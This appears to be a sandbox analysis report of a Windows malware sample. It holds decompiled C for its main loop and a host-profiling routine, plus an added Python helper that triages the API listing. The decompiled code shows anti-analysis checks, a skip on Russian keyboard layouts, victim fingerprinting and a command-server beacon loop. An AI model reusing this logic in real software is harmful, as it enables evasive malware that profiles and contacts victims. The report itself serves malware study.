f9d79b9 1914->1921 1922 f9d79d6 1914->1922 1933 f9d7140 1915->1933 1918 f9d72b0 5 API calls 1916->1918 1919 f9d779d lstrlenW 1917->1919 1920 f9d77b4 VirtualFree 1917->1920 1918->1917 1919->1920 1920->1902 2021 f9d6e90 1921->2021 1922->1915 1924 f9d7862 GetDriveTypeW 1924->1931 1927 f9d7889 lstrcatW lstrcatW lstrcatW GetDiskFreeSpaceW 1930 f9d7963 lstrcatW 1927->1930 1927->1931 1928 f9d79c4 VirtualFree 1928->1922 1929 f9d7983 lstrlenW 1929->1911 1930->1931 1931->1924 1931->1927 1931->1929 1932 f9d78fc lstrlenW wsprintfW lstrlenW wsprintfW lstrcatW 1931->1932 
[Callgraph edge data for the rendered graph omitted; it is the node/edge list behind the diagram, not readable text. The edges cover the basic blocks of the functions at 0F9D28xx-0F9D90xx in this memory dump and the Win32 calls they make: lstrlenW/lstrcatW/wsprintfW string assembly with VirtualAlloc/VirtualFree; RegQueryValueExW/RegCloseKey and RegCreateKeyExW/RegSetValueExW; CreateToolhelp32Snapshot with Process32FirstW/Process32NextW and lstrcmpiW (process-name scan); WinINet InternetOpenW, InternetConnectW, HttpOpenRequestW, HttpAddRequestHeadersW, HttpSendRequestW, InternetReadFile, InternetCloseHandle; CryptAcquireContextW, CryptGenKey, CryptExportKey, CryptDestroyKey, CryptReleaseContext; CryptStringToBinaryA and CryptBinaryToStringA; VerSetConditionMask/VerifyVersionInfoW; CreatePipe, SetHandleInformation, CreateProcessW, ReadFile (child process with captured output); CreateFileW, GetFileSize, CreateFileMappingW, MapViewOfFile, UnmapViewOfFile, WriteFile; GetModuleFileNameW, GetTempPathW, GetEnvironmentVariableW, ShellExecuteW, ExitProcess; EnumDeviceDrivers/GetDeviceDriverBaseNameW/lstrcmpiW (driver-name check); GetModuleHandleA, LoadLibraryA, GetProcAddress; RegisterClassExW, CreateWindowExW, SetWindowLongW, ShowWindow, UpdateWindow, GetMessageW, TranslateMessage, DispatchMessageW, BeginPaint, TextOutW, EndPaint, DestroyWindow, SendMessageW, ExitThread; IsProcessorFeaturePresent, GetPEB, InitializeCriticalSection.]

                                        Callgraph

[Callgraph node/edge data for the rendered graph omitted; only the graph legend (Executed / Not Executed / Opacity -> Relevance / Disassembly available) and the node list survived extraction. Nodes are the functions Function_0F9D1020 through Function_0F9D9010 of this dump. The main routine Function_0F9D4950 has edges to Function_0F9D4600, Function_0F9D5880, Function_0F9D3AA0, Function_0F9D63D0, Function_0F9D46F0, Function_0F9D43E0, Function_0F9D3BE0, Function_0F9D40E0, Function_0F9D4000, Function_0F9D4930, Function_0F9D4030, Function_0F9D3E20, Function_0F9D6420 and Function_0F9D6390, matching the C-Code listing below. Function_0F9D5880 reaches Function_0F9D7330 (host profile), Function_0F9D54A0 and, through it, Function_0F9D7EF0/Function_0F9D7CE0 (WinINet); Function_0F9D2D30 reaches Function_0F9D2F50 (EnumDeviceDrivers) and Function_0F9D2AD0 (file/registry writes).]

                                        Control-flow Graph

                                        C-Code - Quality: 100%
                                        			E0F9D4950() {
                                        				void* _v8;
                                        				void* _v12;
                                        				CHAR* _v16;
                                        				int _v20;
                                        				void* _v24;
                                        				int _v28;
                                        				void* _v32;
                                        				int _v36;
                                        				int _v40;
                                        				int _v44;
                                        				int _v48;
                                        				int _v52;
                                        				int _v60;
                                        				char _v80;
                                        				void* _t54;
                                        				int _t79;
                                        				void* _t81;
                                        				short* _t97;
                                        				void* _t114;
                                        
                                        				Sleep(0x3e8); // executed; 1000 ms delay before any real work
                                        				_t54 = E0F9D4600(_t90, _t106); // executed; environment/instance check (CreateMutexW + GetLastError, see APIs below); a nonzero result ends the process
                                        				if(_t54 == 0) {
                                        					_v8 = CreateThread(0, 0, E0F9D2D30, 0, 0, 0); // worker: EnumDeviceDrivers/GetDeviceDriverBaseNameW name check, then a window with a message loop (see callgraph)
                                        					if(_v8 != 0) {
                                        						if(WaitForSingleObject(_v8, 0x1388) == 0x102) { // 5 s budget; 0x102 == WAIT_TIMEOUT
                                        							_t90 = _v8;
                                        							TerminateThread(_v8, 0); // kill the worker if it overran its budget
                                        						}
                                        						_t106 = _v8;
                                        						CloseHandle(_v8);
                                        					}
                                        					E0F9D46F0();
                                        					E0F9D40E0(_t90, _t106);
                                        					E0F9D6420( &_v80);
                                        					_v40 = 0;
                                        					_v36 = 0;
                                        					_v28 = 0;
                                        					_v44 = 0;
                                        					E0F9D63D0( &_v80,  &_v28,  &_v44,  &_v40,  &_v36); // fills the parameters handed to E0F9D5880 below
                                        					_v48 = 0;
                                        					_v16 = 0; // receives the server response (base64 text)
                                        					if(E0F9D4930(_v28) == 0) {
                                        						while(_v48 == 0) { // beacon loop: retry every 10 s until the server answers
                                        							_t81 = E0F9D5880(_v28, _v44, _v40, _v36,  &_v16); // per callgraph: host profile (E0F9D7330) -> CryptBinaryToStringA -> HTTP via E0F9D54A0/E0F9D7EF0
                                        							_t114 = _t114 + 0xc;
                                        							if(_t81 != 0) {
                                        								_v48 = 1;
                                        							} else {
                                        								Sleep(0x2710); // 10 000 ms
                                        							}
                                        						}
                                        						E0F9D6390( &_v80);
                                        						_v32 = 0;
                                        						_v20 = 0;
                                        						_v52 = 0;
                                        						_v60 = 0;
                                        						__eflags = _v16;
                                        						if(_v16 == 0) {
                                        							L19:
                                        							E0F9D4030();
                                        							InitializeCriticalSection(0xf9e2a48);
                                        							__eflags = _v52;
                                        							if(__eflags == 0) {
                                        								E0F9D3E20( &_v80); // no decoded response available
                                        							} else {
                                        								E0F9D4000(_v32, _v20, __eflags); // decoded response buffer and its length
                                        							}
                                        							DeleteCriticalSection(0xf9e2a48);
                                        							__eflags = E0F9D3AA0();
                                        							if(__eflags != 0) {
                                        								E0F9D43E0(__eflags);
                                        							}
                                        							_v24 = VirtualAlloc(0, 0x200, 0x3000, 4); // 0x3000 == MEM_COMMIT|MEM_RESERVE, 4 == PAGE_READWRITE
                                        							__eflags = _v24;
                                        							if(__eflags != 0) {
                                        								GetModuleFileNameW(0, _v24, 0x100); // path of the running image
                                        								E0F9D3BE0(_v24, _v24, __eflags);
                                        								VirtualFree(_v24, 0, 0x8000); // 0x8000 == MEM_RELEASE
                                        							}
                                        							__eflags =  *0xf9e2a44;
                                        							if( *0xf9e2a44 != 0) {
                                        								_t97 =  *0xf9e2a44; // 0x60000
                                        								ShellExecuteW(0, L"open", _t97, 0, 0, 5); // 5 == SW_SHOW
                                        							}
                                        							ExitThread(0);
                                        						}
                                        						_v20 = lstrlenA(_v16);
                                        						_v32 = VirtualAlloc(0, _v20, 0x3000, 4);
                                        						_t79 = CryptStringToBinaryA(_v16, 0, 1, _v32,  &_v20, 0, 0); // 1 == CRYPT_STRING_BASE64; _v20 receives the decoded length
                                        						__eflags = _t79;
                                        						if(_t79 != 0) {
                                        							_v52 = 1;
                                        							goto L19;
                                        						}
                                        						ExitProcess(0); // response was not valid base64
                                        					} else {
                                        						_v12 = VirtualAlloc(0, 0x200, 0x3000, 4);
                                        						_t119 = _v12;
                                        						if(_v12 != 0) {
                                        							GetModuleFileNameW(0, _v12, 0x100);
                                        							E0F9D3BE0(_v12,  &_v44, _t119);
                                        							VirtualFree(_v12, 0, 0x8000);
                                        						}
                                        						ExitProcess(0);
                                        					}
                                        				}
                                        				ExitProcess(0); // executed; taken in this run because E0F9D4600 returned nonzero
                                        			}

                                        [Per-line instruction address column omitted: one address per C line of the listing above, 0x0f9d495b through 0x0f9d4bcf (the goto L19 entry carries 0x00000000).]

                                        APIs
                                        • Sleep.KERNELBASE(000003E8), ref: 0F9D495B
                                          • Part of subcall function 0F9D4600: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D465C
                                          • Part of subcall function 0F9D4600: lstrcpyW.KERNEL32 ref: 0F9D467F
                                          • Part of subcall function 0F9D4600: lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D4686
                                          • Part of subcall function 0F9D4600: CreateMutexW.KERNELBASE(00000000,00000000,00000000,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D469E
                                          • Part of subcall function 0F9D4600: GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D46AA
                                          • Part of subcall function 0F9D4600: GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D46B1
                                          • Part of subcall function 0F9D4600: VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D46CB
                                        • ExitProcess.KERNEL32 ref: 0F9D496C
                                        • CreateThread.KERNEL32 ref: 0F9D4981
                                        • WaitForSingleObject.KERNEL32(00000000,00001388), ref: 0F9D4999
                                        • TerminateThread.KERNEL32(00000000,00000000), ref: 0F9D49AC
                                        • CloseHandle.KERNEL32(00000000), ref: 0F9D49B6
                                        • VirtualAlloc.KERNEL32(00000000,00000200,00003000,00000004,00000000,00000000,00000000,00000000), ref: 0F9D4A2A
                                        • GetModuleFileNameW.KERNEL32(00000000,00000000,00000100), ref: 0F9D4A44
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F9D4A5D
                                        • ExitProcess.KERNEL32 ref: 0F9D4A65
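The APIs listing above is useful beyond reading: the same lines can be parsed and matched against the behaviours the decompiled routine shows (an initial Sleep, a CreateMutexW/GetLastError pair inside a subcall, and a worker thread given a 5 s budget and terminated on timeout). The following is an added triage helper, not part of the Joe Sandbox report or the sample; it assumes the bullet layout as rendered on this page and uses the listing for E0F9D4950 as constructed input.

```python
"""Parse a Joe Sandbox 'APIs' listing and flag patterns seen in E0F9D4950.

Added example for this report page; the line format it expects is the one
rendered above ("• Api.MODULE(args), ref: ADDR" and the indented
"Part of subcall function XXXX:" variant). It runs offline on the listing
copied below as constructed input.
"""
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample: the APIs listing for E0F9D4950 as shown in the report.
SAMPLE_API_LISTING = """\
• Sleep.KERNELBASE(000003E8), ref: 0F9D495B
  • Part of subcall function 0F9D4600: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D465C
  • Part of subcall function 0F9D4600: lstrcpyW.KERNEL32 ref: 0F9D467F
  • Part of subcall function 0F9D4600: lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D4686
  • Part of subcall function 0F9D4600: CreateMutexW.KERNELBASE(00000000,00000000,00000000,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D469E
  • Part of subcall function 0F9D4600: GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D46AA
  • Part of subcall function 0F9D4600: GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D46B1
  • Part of subcall function 0F9D4600: VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D46CB
• ExitProcess.KERNEL32 ref: 0F9D496C
• CreateThread.KERNEL32 ref: 0F9D4981
• WaitForSingleObject.KERNEL32(00000000,00001388), ref: 0F9D4999
• TerminateThread.KERNEL32(00000000,00000000), ref: 0F9D49AC
• CloseHandle.KERNEL32(00000000), ref: 0F9D49B6
• VirtualAlloc.KERNEL32(00000000,00000200,00003000,00000004,00000000,00000000,00000000,00000000), ref: 0F9D4A2A
• GetModuleFileNameW.KERNEL32(00000000,00000000,00000100), ref: 0F9D4A44
• VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F9D4A5D
• ExitProcess.KERNEL32 ref: 0F9D4A65
"""

API_LINE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<caller>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: tuple            # ints for hex literals, None where the report shows '?'
    ref: int               # address of the call site
    caller: Optional[str]  # subcall function address, or None for the function itself


def parse_args(text: Optional[str]) -> tuple:
    """'000003E8,?' -> (1000, None); the report prints every argument in hex."""
    if not text:
        return ()
    return tuple(None if a.strip() == "?" else int(a, 16) for a in text.split(","))


def parse_listing(text: str) -> list:
    calls = []
    for line in text.splitlines():
        if not line.strip():
            continue
        m = API_LINE.match(line)
        if not m:
            raise ValueError(f"unrecognised API line: {line!r}")
        calls.append(ApiCall(m["api"], m["module"], parse_args(m["args"]),
                             int(m["ref"], 16), m["caller"]))
    return calls


def find_initial_sleep(calls: list) -> Optional[dict]:
    """A Sleep() as the function's first own call: a cheap delay before real work."""
    own = [c for c in calls if c.caller is None]
    if own and own[0].api == "Sleep" and own[0].args:
        return {"ms": own[0].args[0]}
    return None


def find_mutex_guard(calls: list) -> Optional[dict]:
    """CreateMutexW immediately followed by GetLastError in the same subcall:
    the usual shape of a single-instance check (ERROR_ALREADY_EXISTS test)."""
    for a, b in zip(calls, calls[1:]):
        if a.api == "CreateMutexW" and b.api == "GetLastError" and a.caller == b.caller:
            return {"in_function": a.caller, "ref": f"{a.ref:08X}"}
    return None


def find_timed_worker_thread(calls: list) -> Optional[dict]:
    """CreateThread -> WaitForSingleObject(h, timeout) -> TerminateThread -> CloseHandle:
    a worker given a fixed time budget and killed if it overruns."""
    own = [c for c in calls if c.caller is None]
    for i, c in enumerate(own):
        if c.api != "CreateThread":
            continue
        following = [x.api for x in own[i + 1:i + 4]]
        if following == ["WaitForSingleObject", "TerminateThread", "CloseHandle"]:
            wait = own[i + 1]
            timeout = wait.args[1] if len(wait.args) > 1 else None
            return {"ref": f"{c.ref:08X}", "timeout_ms": timeout}
    return None


def triage(text: str) -> dict:
    calls = parse_listing(text)
    return {
        "calls": len(calls),
        "initial_sleep": find_initial_sleep(calls),
        "mutex_guard": find_mutex_guard(calls),
        "timed_worker_thread": find_timed_worker_thread(calls),
    }


if __name__ == "__main__":
    for name, finding in triage(SAMPLE_API_LISTING).items():
        print(f"{name}: {finding}")
```

On the listing above this reports the 1000 ms initial sleep, the CreateMutexW/GetLastError pair inside 0F9D4600 and the worker thread created at 0F9D4981 with a 0x1388 (5000 ms) budget. The three matchers are deliberately narrow; add further ones (for example the Sleep(0x2710) retry loop visible in the C-Code) by checking the same parsed ApiCall sequence rather than the raw text.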
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Virtual$AllocCreateErrorExitFreeLastProcessThread$CloseFileHandleModuleMutexNameObjectSingleSleepTerminateWaitlstrcpylstrlen
                                        • String ID: open
                                        • API String ID: 1803241880-2758837156
                                        • Opcode ID: 9136fcd2564ae6bddbfd51de2acd97257eca2c5ca8741ec4a13773ee70ffb6b9
                                        • Instruction ID: fdc6b6d1c67c11643e8d9a4aae9d46fc8452dfa71bc028d6fef35184dbc77727
                                        • Opcode Fuzzy Hash: 9136fcd2564ae6bddbfd51de2acd97257eca2c5ca8741ec4a13773ee70ffb6b9
                                        • Instruction Fuzzy Hash: DC710D70A45309ABEB14DBA4DC5AFEE7B78AB44716F308014F2017A1C2DBB86994CF65
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        [Control-flow graph data for E0F9D7330 (rendered graph, legend Executed / Not Executed) omitted. Its basic blocks, in order, are: VirtualAlloc + GetUserNameW; VirtualAlloc + GetComputerNameW; a registry read through the helper f9d72b0 (RegQueryValueExW); VirtualAlloc + RegOpenKeyExW/RegQueryValueExW/RegCloseKey, whose value is compared with lstrcmpiW and, on match, leads to wsprintfW + ExitProcess; a second keyed RegOpenKeyExW/RegQueryValueExW lookup built with wsprintfW; GetNativeSystemInfo, with one branch again ending in wsprintfW + ExitProcess; a call to f9d7a10; VirtualAlloc * 2 + GetWindowsDirectoryW + GetVolumeInformationW + f9d72b0, then wsprintfW/lstrcatW and GetModuleHandleW/GetProcAddress; a loop over drive letters with GetDriveTypeW, lstrcatW * 3 and GetDiskFreeSpaceW, formatting each hit with f9d8950 * 2, wsprintfW and lstrcatW; finally VirtualAlloc + a call to f9d6e90 (the WinINet path) and VirtualFree.]
                                        C-Code - Quality: 88%
                                        			E0F9D7330(DWORD* __ecx, void* __edx) {
                                        				void* _v8;
                                        				void* _v12;
                                        				long _v16;
                                        				long _v20;
                                        				int _v24;
                                        				int _v28;
                                        				intOrPtr _v32;
                                        				short _v36;
                                        				short _v40;
                                        				WCHAR* _v44;
                                        				WCHAR* _v48;
                                        				WCHAR* _v52;
                                        				WCHAR* _v56;
                                        				WCHAR* _v60;
                                        				WCHAR* _v64;
                                        				WCHAR* _v68;
                                        				signed short _v76;
                                        				char _v132;
                                        				void* _t154;
                                        				long _t155;
                                        				short _t158;
                                        				short _t159;
                                        				short _t160;
                                        				signed int _t161;
                                        				signed int _t166;
                                        				void* _t181;
                                        				signed int _t183;
                                        				signed int _t186;
                                        				WCHAR* _t190;
                                        				void* _t191;
                                        				void* _t199;
                                        				_Unknown_base(*)()* _t204;
                                        				signed int _t211;
                                        				intOrPtr _t216;
                                        				WCHAR* _t218;
                                        				WCHAR* _t220;
                                        				void* _t224;
                                        				int _t230;
                                        				void* _t238;
                                        				WCHAR* _t246;
                                        				void* _t247;
                                        				WCHAR* _t249;
                                        				WCHAR* _t250;
                                        				WCHAR* _t252;
                                        				void* _t256;
                                        				DWORD* _t260;
                                        				short* _t261;
                                        				DWORD* _t266;
                                        				void* _t267;
                                        				signed int _t270;
                                        				void* _t274;
                                        				void* _t276;
                                        				void* _t277;
                                        				DWORD* _t279;
                                        				void* _t280;
                                        				void* _t281;
                                        
                                        				_t267 = __edx;
                                        				_t260 = __ecx;
                                        				_t279 = __ecx;
                                        				if( *__ecx != 0) {
                                        					_t252 = VirtualAlloc(0, 0x202, 0x3000, 4);
                                        					_t260 =  &_v24;
                                        					 *(_t279 + 8) = _t252;
                                        					_v24 = 0x100;
                                        					GetUserNameW(_t252, _t260);
                                        				}
                                        				if( *((intOrPtr*)(_t279 + 0xc)) != 0) {
                                        					_v24 = 0x1e;
                                        					_t250 = VirtualAlloc(0, 0x20, 0x3000, 4);
                                        					_t260 =  &_v24;
                                        					 *(_t279 + 0x14) = _t250;
                                        					GetComputerNameW(_t250, _t260);
                                        				}
                                        				if( *((intOrPtr*)(_t279 + 0x18)) == 0) {
                                        					L11:
                                        					if( *(_t279 + 0x30) == 0) {
                                        						L18:
                                        						if( *((intOrPtr*)(_t279 + 0x3c)) == 0) {
                                        							L31:
                                        							if( *((intOrPtr*)(_t279 + 0x48)) != 0) {
                                        								_t220 = VirtualAlloc(0, 0x82, 0x3000, 4);
                                        								_push(_t260);
                                        								 *(_t279 + 0x50) = _t220;
                                        								if(E0F9D72B0(_t260, 0x80000002, L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", L"productName", _t220, 0x80) == 0) {
                                        									_push(_t260);
                                        									E0F9D72B0(_t260, 0x80000002, L"SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion", L"productName",  *(_t279 + 0x50), 0x80);
                                        									wsprintfW( *(_t279 + 0x50), L"error");
                                        									_t281 = _t281 + 8;
                                        								}
                                        							}
                                        							if( *((intOrPtr*)(_t279 + 0x54)) == 0) {
                                        								L44:
                                        								if( *((intOrPtr*)(_t279 + 0x24)) != 0) {
                                        									_v28 = 0;
                                        									_t216 = E0F9D7A10(_t279 + 0x2c,  &_v28);
                                        									if(_t216 == 0) {
                                        										 *((intOrPtr*)(_t279 + 0x24)) = _t216;
                                        									}
                                        								}
                                        								if( *((intOrPtr*)(_t279 + 0x60)) != 0) {
                                        									_t190 = VirtualAlloc(0, 0x400, 0x3000, 4); // executed
                                        									 *(_t279 + 0x68) = _t190;
                                        									_t191 = VirtualAlloc(0, 0xe0c, 0x3000, 4); // executed
                                        									_t276 = _t191;
                                        									GetWindowsDirectoryW(_t276, 0x100);
                                        									_t66 = _t276 + 0x600; // 0x600
                                        									_t266 = _t66;
                                        									 *((short*)(_t276 + 6)) = 0;
                                        									_t68 = _t276 + 0x400; // 0x400
                                        									_t69 = _t276 + 0x604; // 0x604
                                        									_t70 = _t276 + 0x608; // 0x608
                                        									_t71 = _t276 + 0x200; // 0x200
                                        									GetVolumeInformationW(_t276, _t71, 0x100, _t266, _t70, _t69, _t68, 0x100); // executed
                                        									_push(_t266);
                                        									_t72 = _t276 + 0x60c; // 0x60c
                                        									_t260 = _t72;
                                        									_t199 = E0F9D72B0(_t260, 0x80000002, L"HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0", L"ProcessorNameString", _t260, 0x80); // executed
                                        									if(_t199 != 0) {
                                        										_t73 = _t276 + 0x60c; // 0x60c
                                        										_t211 = lstrlenW(_t73);
                                        										_t74 = _t276 + 0x60c; // 0x60c
                                        										_t260 = _t74;
                                        										_push(_t260);
                                        										E0F9D72B0(_t260, 0x80000002, L"HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0", L"Identifier", _t260 + _t211 * 2, 0x80); // executed
                                        									}
                                        									wsprintfW( *(_t279 + 0x68), L"%d",  *(_t276 + 0x600));
                                        									_t79 = _t276 + 0x60c; // 0x60c
                                        									_t281 = _t281 + 0xc;
                                        									lstrcatW( *(_t279 + 0x68), _t79);
                                        									_t204 = GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "RtlComputeCrc32");
                                        									_v28 = _t204;
                                        									if(_t204 == 0) {
                                        										 *(_t279 + 0x6c) = 0;
                                        									} else {
                                        										 *(_t279 + 0x6c) = _v28(0x29a,  *(_t279 + 0x68), lstrlenW( *(_t279 + 0x68)) + _t207);
                                        									}
                                        									 *(_t279 + 0x70) =  *(_t276 + 0x600);
                                        									VirtualFree(_t276, 0, 0x8000); // executed
                                        								}
                                        								if( *((intOrPtr*)(_t279 + 0x74)) == 0) {
                                        									L67:
                                        									if( *(_t279 + 0x80) == 0) {
                                        										L72:
                                        										return 1;
                                        									}
                                        									_t154 = VirtualAlloc(0, 0x81, 0x3000, 4);
                                        									 *(_t279 + 0x84) = _t154;
                                        									if(_t154 == 0) {
                                        										L71:
                                        										 *(_t279 + 0x80) = 0;
                                        										goto L72;
                                        									}
                                        									_push(_t260);
                                        									_t155 = E0F9D6E90(_t154);
                                        									if(_t155 != 0) {
                                        										goto L72;
                                        									}
                                        									VirtualFree( *(_t279 + 0x84), _t155, 0x8000);
                                        									goto L71;
                                        								} else {
                                        									_v68 = L"UNKNOWN";
                                        									_v64 = L"NO_ROOT_DIR";
                                        									_v60 = L"REMOVABLE";
                                        									_v56 = L"FIXED";
                                        									_v52 = L"REMOTE";
                                        									_v48 = L"CDROM";
                                        									_v44 = L"RAMDISK";
                                        									 *(_t279 + 0x7c) = VirtualAlloc(0, 0x400, 0x3000, 4);
                                        									_t261 =  &_v132;
                                        									_t158 = 0x41;
                                        									do {
                                        										 *_t261 = _t158;
                                        										_t261 = _t261 + 2;
                                        										_t158 = _t158 + 1;
                                        									} while (_t158 <= 0x5a);
                                        									_t159 =  *L"?:\\"; // 0x3a003f
                                        									_v40 = _t159;
                                        									_t160 =  *0xf9df348; // 0x5c
                                        									_v36 = _t160;
                                        									_t161 = 0;
                                        									_v24 = 0;
                                        									do {
                                        										_v40 =  *((intOrPtr*)(_t280 + _t161 * 2 - 0x80));
                                        										_t270 = GetDriveTypeW( &_v40);
                                        										if(_t270 > 2 && _t270 != 5) {
                                        											_v36 = 0;
                                        											lstrcatW( *(_t279 + 0x7c),  &_v40);
                                        											_v36 = 0x5c;
                                        											lstrcatW( *(_t279 + 0x7c),  *(_t280 + _t270 * 4 - 0x40));
                                        											lstrcatW( *(_t279 + 0x7c), "_");
                                        											if(GetDiskFreeSpaceW( &_v40,  &_v28,  &_v20,  &_v12,  &_v16) == 0) {
                                        												lstrcatW( *(_t279 + 0x7c), L"0,");
                                        												goto L64;
                                        											}
                                        											_v8 = E0F9D8950(_v16, 0, _v28 * _v20, 0);
                                        											_t256 = _t267;
                                        											_t181 = E0F9D8950(_v12, 0, _v28 * _v20, 0);
                                        											_t274 = _v8;
                                        											_v32 = _t274 - _t181;
                                        											asm("sbb eax, edx");
                                        											_v8 = _t256;
                                        											_t183 = lstrlenW( *(_t279 + 0x7c));
                                        											_push(_t256);
                                        											wsprintfW( &(( *(_t279 + 0x7c))[_t183]), L"%I64u/", _t274);
                                        											_t186 = lstrlenW( *(_t279 + 0x7c));
                                        											_push(_v8);
                                        											wsprintfW( &(( *(_t279 + 0x7c))[_t186]), L"%I64u", _v32);
                                        											_t281 = _t281 + 0x20;
                                        											lstrcatW( *(_t279 + 0x7c), ",");
                                        										}
                                        										_t161 = _v24 + 1;
                                        										_v24 = _t161;
                                        									} while (_t161 < 0x1b);
                                        									_t166 = lstrlenW( *(_t279 + 0x7c));
                                        									_t260 =  *(_t279 + 0x7c);
                                        									 *((short*)(_t260 + _t166 * 2 - 2)) = 0;
                                        									goto L67;
                                        								}
                                        							} else {
                                        								__imp__GetNativeSystemInfo( &_v76);
                                        								_t218 = VirtualAlloc(0, 0x40, 0x3000, 4);
                                        								_t260 = _v76 & 0x0000ffff;
                                        								 *(_t279 + 0x5c) = _t218;
                                        								if(_t260 > 9) {
                                        									L42:
                                        									_push(L"Unknown");
                                        									L43:
                                        									wsprintfW(_t218, ??);
                                        									_t281 = _t281 + 8;
                                        									goto L44;
                                        								}
                                        								_t260 =  *(_t260 + E0F9D7A00) & 0x000000ff;
                                        								switch( *((intOrPtr*)(_t260 * 4 +  &M0F9D79EC))) {
                                        									case 0:
                                        										_push(L"x86");
                                        										goto L43;
                                        									case 1:
                                        										_push(L"ARM");
                                        										goto L43;
                                        									case 2:
                                        										_push(L"Itanium");
                                        										goto L43;
                                        									case 3:
                                        										_push(L"x64");
                                        										goto L43;
                                        									case 4:
                                        										goto L42;
                                        								}
                                        							}
                                        						}
                                        						_t224 = VirtualAlloc(0, 0x8a, 0x3000, 4);
                                        						_v8 = _t224;
                                        						_v20 = _t224 + 0xe;
                                        						 *(_t279 + 0x44) = VirtualAlloc(0, 4, 0x3000, 4);
                                        						_t277 = 1;
                                        						_v24 = 1;
                                        						do {
                                        							wsprintfW(_v8, L"%d", _t277);
                                        							_t281 = _t281 + 0xc;
                                        							_v16 = 0;
                                        							_t277 = _t277 + 1;
                                        							if(RegOpenKeyExW(0x80000001, L"Keyboard Layout\\Preload", 0, 0x20019,  &_v12) != 0) {
                                        								L27:
                                        								_t230 = 0;
                                        								_v24 = 0;
                                        								goto L28;
                                        							}
                                        							_v28 = 0x80;
                                        							if(RegQueryValueExW(_v12, _v8, 0, 0, _v20,  &_v28) != 0) {
                                        								GetLastError();
                                        							} else {
                                        								_v16 = 1;
                                        							}
                                        							RegCloseKey(_v12);
                                        							if(_v16 == 0) {
                                        								goto L27;
                                        							} else {
                                        								if(lstrcmpiW(_v20, L"00000419") == 0) {
                                        									_t218 = wsprintfW( *(_t279 + 0x44), "1");
                                        									_t281 = _t281 + 8;
                                        									ExitProcess(0);
                                        								}
                                        								_t230 = _v24;
                                        							}
                                        							L28:
                                        						} while (_t277 != 9 && _t230 != 0);
                                        						wsprintfW( *(_t279 + 0x44), "0");
                                        						_t281 = _t281 + 8;
                                        						VirtualFree(_v8, 0, 0x8000);
                                        						goto L31;
                                        					}
                                        					_t238 = VirtualAlloc(0, 0x80, 0x3000, 4);
                                        					_v20 = _t238;
                                        					 *(_t279 + 0x38) = _t238;
                                        					_v12 = 0;
                                        					if(RegOpenKeyExW(0x80000001, L"Control Panel\\International", 0, 0x20019,  &_v8) != 0) {
                                        						L17:
                                        						 *(_t279 + 0x30) = 0;
                                        						VirtualFree( *(_t279 + 0x38), 0, 0x8000);
                                        						goto L18;
                                        					}
                                        					_v24 = 0x40;
                                        					if(RegQueryValueExW(_v8, L"LocaleName", 0, 0, _v20,  &_v24) != 0) {
                                        						GetLastError();
                                        					} else {
                                        						_v12 = 1;
                                        					}
                                        					RegCloseKey(_v8);
                                        					if(_v12 != 0) {
                                        						goto L18;
                                        					} else {
                                        						goto L17;
                                        					}
                                        				} else {
                                        					_t246 = VirtualAlloc(0, 0x80, 0x3000, 4); // executed
                                        					 *(_t279 + 0x20) = _t246;
                                        					if(_t246 == 0) {
                                        						goto L11;
                                        					}
                                        					_push(_t260);
                                        					_t247 = E0F9D72B0(_t260, 0x80000002, L"SYSTEM\\CurrentControlSet\\services\\Tcpip\\Parameters", L"Domain", _t246, 0x80); // executed
                                        					if(_t247 == 0) {
                                        						wsprintfW( *(_t279 + 0x20), L"undefined");
                                        						L10:
                                        						_t281 = _t281 + 8;
                                        						goto L11;
                                        					}
                                        					_t249 =  *(_t279 + 0x20);
                                        					if( *_t249 != 0) {
                                        						goto L11;
                                        					}
                                        					wsprintfW(_t249, L"WORKGROUP");
                                        					goto L10;
                                        				}
                                        			}
                                        0x0f9d762b
                                        0x0f9d75ff
